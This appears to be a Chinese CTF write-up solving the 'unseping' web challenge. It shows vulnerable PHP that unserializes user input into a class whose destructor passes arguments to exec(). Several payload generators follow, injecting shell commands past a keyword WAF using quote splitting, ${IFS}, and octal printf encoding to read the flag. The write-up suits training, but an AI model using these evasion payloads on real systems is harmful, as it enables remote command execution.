攻防世界37-unseping-CTFWeb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<?php
highlight_file(__FILE__);

class ease{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
 
    function __destruct(){
        if (in_array($this->method, array("ping"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    } 
 
    function ping($ip){
        exec($ip, $result);
        var_dump($result);
    }

    function waf($str){
        if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
            return $str;
        } else {
            echo "don't hack";
        }
    }
 
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf($v);
        }
    }   
}

$ctf=@$_POST['ctf'];
@unserialize(base64_decode($ctf));
?>

if (!preg_match_all(“/(||&|;| |/|cat|flag|tac|php|ls)/“, $str, $pat_array))做了过滤

且if (in_array($this->method, array(“ping”))),ping必须是method

这是一个反序列化问题

随便试一试,得到输出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
class ease{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
     
}
 
$o=new ease("ping",array("ifconfig"));
$s = serialize($o);
echo base64_encode($s);
?>

image-20241111130152595

ls被过滤了,有几种绕过方法

  • 单引号,有效
  • 双引号,有效
  • ${IFS},${Z}有效
  • l\s也行

空格被过滤了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
class ease{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
     
}
 
$o=new ease("ping",array('l""s${IFS}f""lag_1s_here'));
$s = serialize($o);
echo base64_encode($s);
?>

image-20241111130809076

/\都被过滤了

使用8进制编码”/“,“/“的八进制编码为\57,使用$(printf${IFS}”\57”)内敛执行输出“/”到字符串中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
class ease{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
     
}
 
$o = new ease('ping', array('more${IFS}fl""ag_1s_here$(printf${IFS}"\57")f\lag_831b69012c67b35f.p\hp'));
//$o = new ease('ping', array('c""at${IFS}fl""ag_1s_here$(printf${IFS}"\57")f""lag_831b69012c67b35f.p""hp'));
// 
$s = serialize($o);
echo base64_encode($s);
?>

得cyberpeace{305550cf468dbcfe0d6f5f0356c42ab4}

image-20241111132234881

然后手动加斜杠也行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
class ease{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
     
}
$o=new ease("ping",array('$(printf${IFS}"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160")'));
$s = serialize($o);
echo base64_encode($s);
?>